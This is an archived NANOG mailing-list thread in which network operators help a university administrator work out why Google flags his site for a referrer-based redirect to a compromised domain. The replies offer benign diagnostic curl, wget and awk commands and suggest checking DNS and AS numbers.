The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard 
> [mailto:dhubb...@dino.hostasaurus.com<mailto:dhubbard@dino.hostasaurus
> .com>]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
> tp ://www.csulb.edu<http://www.csulb.edu>
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
> tp ://www.couchtarts.com<http://www.couchtarts.com>
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
> +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black 
>> [mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org<mailto:nanog@nanog.org>
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as 
>> containing malware. They claim our home page returns no results, but 
>> redirects users to another compromised website 
>> couchtarts.com<http://couchtarts.com>.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files 
>> and are not redirecting to the problem target site. No recent changes 
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and 
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been 
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach 
>> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> 
>> 
>> 
> 
> 
> 
> 

Re: DNS poisoning at Google?

[Jeff Fisher]

On 06/26/2012 11:05 PM, Matthew Black wrote:

Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.


Except it is redirecting as shown by Jeremy:

[guppy@mrlaptop ~]$ curl -e 'http://google.com' csulb.edu


301 Moved Permanently

Moved Permanently
The document has moved href="http://www.couchtarts.com/media.php";>here.



That looks like a redirect to me.

Jeff

RE: DNS poisoning at Google?

[Matthew Black]

Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach





-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com] 
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:24 PM, Matthew Black  wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
> 
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com<http://couchtarts.com>.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> 
> 
> 
> --
> Landon Stewart mailto:lstew...@superb.net>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead 
> of the Rest": 
> http://www.superbhosting.net<http://www.superbhosting.net/>
> 

RE: DNS poisoning at Google?

[Matthew Black]

Q:have you consulted the logs?

Seriously? Our servers have multiple log files due to multiple virtual hosts. 
Our primary domain log file on just one server has over 600,000 records x 3 
servers.

Probably over 100,000 304 redirects in our logs.

couchtarts.com does not appear in our log files.


matthew black
information technology services
california state university, long beach

-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Tuesday, June 26, 2012 9:56 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

... have you consulted the logs?
If the redirect is there, it ... 1) might not be from the home page, and 2) 
could be in ... user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
... or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

Re: DNS poisoning at Google?

[Jeremy Hanmer]

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu


301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:

> Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard 
> [mailto:dhubb...@dino.hostasaurus.com<mailto:dhubb...@dino.hostasaurus.com>]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.csulb.edu<http://www.csulb.edu>
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.couchtarts.com<http://www.couchtarts.com>
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
> +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black 
>> [mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org<mailto:nanog@nanog.org>
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects
>> users to another compromised website couchtarts.com<http://couchtarts.com>.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files
>> and are not redirecting to the problem target site. No recent changes
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> 
>> 
>> 
> 
> 
> 
> 

Re: DNS poisoning at Google?

[Michael J Wise]

On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

… have you consulted the logs?
If the redirect is there, it … 1) might not be from the home page, and 2) could 
be in … user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
… or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

RE: DNS poisoning at Google?

[Matthew Black]

Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
requests and they keep insisting that our site issues a redirect. Unable to 
duplicate the problem here.

matthew black
information technology services
california state university, long beach

From: Ishmael Rufus [mailto:sakam...@gmail.com]
Sent: Tuesday, June 26, 2012 9:34 PM
To: Matthew Black
Cc: David Hubbard; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Have you tried using Google Webmaster tools?
On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach

-Original Message-
From: David Hubbard 
[mailto:dhubb...@dino.hostasaurus.com<mailto:dhubb...@dino.hostasaurus.com>]
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.csulb.edu<http://www.csulb.edu>

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.couchtarts.com<http://www.couchtarts.com>

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black 
> [mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: DNS poisoning at Google?
>
> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects
> users to another compromised website couchtarts.com<http://couchtarts.com>.
>
> We have thoroughly examined our root .htaccess and httpd.conf files
> and are not redirecting to the problem target site. No recent changes
> either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been
> poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>
>
>

Re: DNS poisoning at Google?

[Sadiq Saif]

couchtarts.com seems to be hosted on a IP belonging to AS32244 (Liquid Web).

On Wed, Jun 27, 2012 at 12:28 AM, Matthew Black  wrote:
> Running Apache on three Solaris servers behind a load balancer.
>
> I forgot how to lookup our AS number to see if it matches couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
>
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.csulb.edu
>
> For example, the couchtarts site they claim yours is redirecting to:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.couchtarts.com
>
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
>
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
>
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
>
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
> +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
>
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
>
> David
>
>
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org
>> Subject: DNS poisoning at Google?
>>
>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects
>> users to another compromised website couchtarts.com.
>>
>> We have thoroughly examined our root .htaccess and httpd.conf files
>> and are not redirecting to the problem target site. No recent changes
>> either.
>>
>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>>
>> We believe the DNS servers used by Google's crawler have been
>> poisoned.
>>
>> Can anyone shed some light on this?
>>
>> matthew black
>> information technology services
>> california state university, long beach
>> www.csulb.edu<http://www.csulb.edu>
>>
>>
>>
>
>
>
>



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org

Re: DNS poisoning at Google?

[Ishmael Rufus]

Have you tried using Google Webmaster tools?

On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black wrote:

> Running Apache on three Solaris servers behind a load balancer.
>
> I forgot how to lookup our AS number to see if it matches couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
>
> Typically if google were pulling your site sometimes from the wrong IP,
> their safe browsing page should indicate it being on another AS number in
> addition to the correct one 2152:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.csulb.edu
>
> For example, the couchtarts site they claim yours is redirecting to:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
> ://www.couchtarts.com
>
> That site's DNS is screwed up and some requests are sent to a different IP
> at a different host, so Google picked up both AS numbers.
>
> Could one of your domain's subdomains be what is actually infected?  You
> seem to have a bunch of them, maybe google is penalizing the whole domain
> over a subdomain?  Not sure if they do that or not.
>
> If your sites are running off of an application like wordpress, etc., you
> may not get the same page that google gets and the application may have
> been hacked.
> Here's a wget command you can use to make requests to your site pretending
> to be google:
>
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
> +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
>
> nanog will probably line wrap that user agent line making it not correct
> so you'll have to put it back together correctly.  It will save the output
> to a file named googlebot.html you can look at to see if anything weird
> ends up being served.
>
> David
>
>
> > -Original Message-
> > From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> > Sent: Tuesday, June 26, 2012 11:53 PM
> > To: nanog@nanog.org
> > Subject: DNS poisoning at Google?
> >
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects
> > users to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files
> > and are not redirecting to the problem target site. No recent changes
> > either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been
> > poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu<http://www.csulb.edu>
> >
> >
> >
>
>
>
>
>

RE: DNS poisoning at Google?

[Matthew Black]

Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach


-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com] 
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects 
> users to another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files 
> and are not redirecting to the problem target site. No recent changes 
> either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu<http://www.csulb.edu>
> 
> 
> 

RE: DNS poisoning at Google?

[Matthew Black]

Running Apache on three Solaris webservers behind a load balancer. No MS 
Windows!

Not sure how malicious software could get between our load balancer and Unix 
servers. Thanks for the tip!

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 9:07 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Is it possible that some malicious software is listening and injecting a 
redirect on the wire?  We've seen this before with a Windows machine being 
infected.
On 26 June 2012 20:53, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com<http://couchtarts.com>.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>



--
Landon Stewart mailto:lstew...@superb.net>>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net<http://www.superbhosting.net/>

Re: DNS poisoning at Google?

[Kevin Day]

On Jun 26, 2012, at 10:53 PM, Matthew Black wrote:

> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?

Not sure if it's related, but yesterday one of my clients (a top 500 alexa 
site) suddenly had most search results (when googling for things like the 
site's name) suddenly change to some other shady looking domain that's just 
sending 302 redirects to the real site. All the same search results are there, 
but they're now sending everyone to the wrong domain that's just redirecting to 
the correct place. No idea how Google thought this is correct and I'm totally 
failing at getting anyone's attention at Google to look into this.

This coincided with this message from @google on twitter yesterday:

Heads up: we're pushing a new Panda data refresh that noticeably affects only 
~1% of queries worldwide.
http://twitter.com/google/status/217366321879453696

But i'm not sure that's related either.

-- Kevin

Re: DNS poisoning at Google?

[Sadiq Saif]

DNS seems to check out from here. Tested against Google DNS, OpenDNS
and Linode's DNS servers.

According to Google:
"Malicious software is hosted on 1 domain(s), including couchtarts.com/."

Normally, I would say this happens due to malicious ads loaded but
this does not seem to be a site that will contain ads. :)

On Wed, Jun 27, 2012 at 12:12 AM, Ishmael Rufus  wrote:
> I am also getting the same issue when accessing his website.
>
> On Tue, Jun 26, 2012 at 11:07 PM, Landon Stewart wrote:
>
>> Is it possible that some malicious software is listening and injecting a
>> redirect on the wire?  We've seen this before with a Windows machine being
>> infected.
>>
>> On 26 June 2012 20:53, Matthew Black  wrote:
>>
>> > Google Safe Browsing and Firefox have marked our website as containing
>> > malware. They claim our home page returns no results, but redirects users
>> > to another compromised website couchtarts.com.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files and
>> > are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> > intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> > www.csulb.edu
>> >
>> >
>>
>>
>> --
>> Landon Stewart 
>> Sr. Administrator
>> Systems Engineering
>> Superb Internet Corp - 888-354-6128 x 4199
>> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
>>



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org

RE: DNS poisoning at Google?

[David Hubbard]

Typically if google were pulling your site sometimes from the
wrong IP, their safe browsing page should indicate it being
on another AS number in addition to the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.csulb.edu

For example, the couchtarts site they claim yours is 
redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.couchtarts.com

That site's DNS is screwed up and some requests are sent
to a different IP at a different host, so Google picked
up both AS numbers.

Could one of your domain's subdomains be what is
actually infected?  You seem to have a bunch of
them, maybe google is penalizing the whole domain over
a subdomain?  Not sure if they do that or not.

If your sites are running off of an application like
wordpress, etc., you may not get the same page that
google gets and the application may have been hacked.
Here's a wget command you can use to make requests to
your site pretending to be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making
it not correct so you'll have to put it back together
correctly.  It will save the output to a file named
googlebot.html you can look at to see if anything weird
ends up being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as 
> containing malware. They claim our home page returns no 
> results, but redirects users to another compromised website 
> couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf 
> files and are not redirecting to the problem target site. No 
> recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu>
> 
> 
> 

Re: DNS poisoning at Google?

[Michael J Wise]

On Jun 26, 2012, at 9:07 PM, Ishmael Rufus wrote:

> I'm glad I'm not the only one that miss this one:
> 
> http://www.csulb.edu
> 
> It is in his signature and email address as well ;)

The queries do seem to be taking a number of seconds, though, as opposed to 
being nearly instant when I reference the DNS servers of record directly.
The results I get at home (via SpeakEasy) all appear correct, though.

> On Tue, Jun 26, 2012 at 11:04 PM, Sadiq Saif  wrote:
> 
>> Accidentally sent that to Matthew only,
>> 
>> mind sharing the domain name?
>> 
>> On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black 
>> wrote:
>>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects users
>> to another compromised website couchtarts.com.
>>> 
>>> We have thoroughly examined our root .htaccess and httpd.conf files and
>> are not redirecting to the problem target site. No recent changes either.
>>> 
>>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>>> 
>>> We believe the DNS servers used by Google's crawler have been poisoned.
>>> 
>>> Can anyone shed some light on this?
>>> 
>>> matthew black
>>> information technology services
>>> california state university, long beach
>>> www.csulb.edu
>>> 
>> 
>> 
>> 
>> --
>> Sadiq S
>> O< ascii ribbon campaign - stop html mail - www.asciiribbon.org
>> 
>> 

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

Re: DNS poisoning at Google?

[Ishmael Rufus]

I am also getting the same issue when accessing his website.

On Tue, Jun 26, 2012 at 11:07 PM, Landon Stewart wrote:

> Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
>
> On 26 June 2012 20:53, Matthew Black  wrote:
>
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects users
> > to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> > are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
> >
>
>
> --
> Landon Stewart 
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
>

Re: DNS poisoning at Google?

[Ishmael Rufus]

I'm glad I'm not the only one that miss this one:

http://www.csulb.edu

It is in his signature and email address as well ;)



On Tue, Jun 26, 2012 at 11:04 PM, Sadiq Saif  wrote:

> Accidentally sent that to Matthew only,
>
> mind sharing the domain name?
>
> On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black 
> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
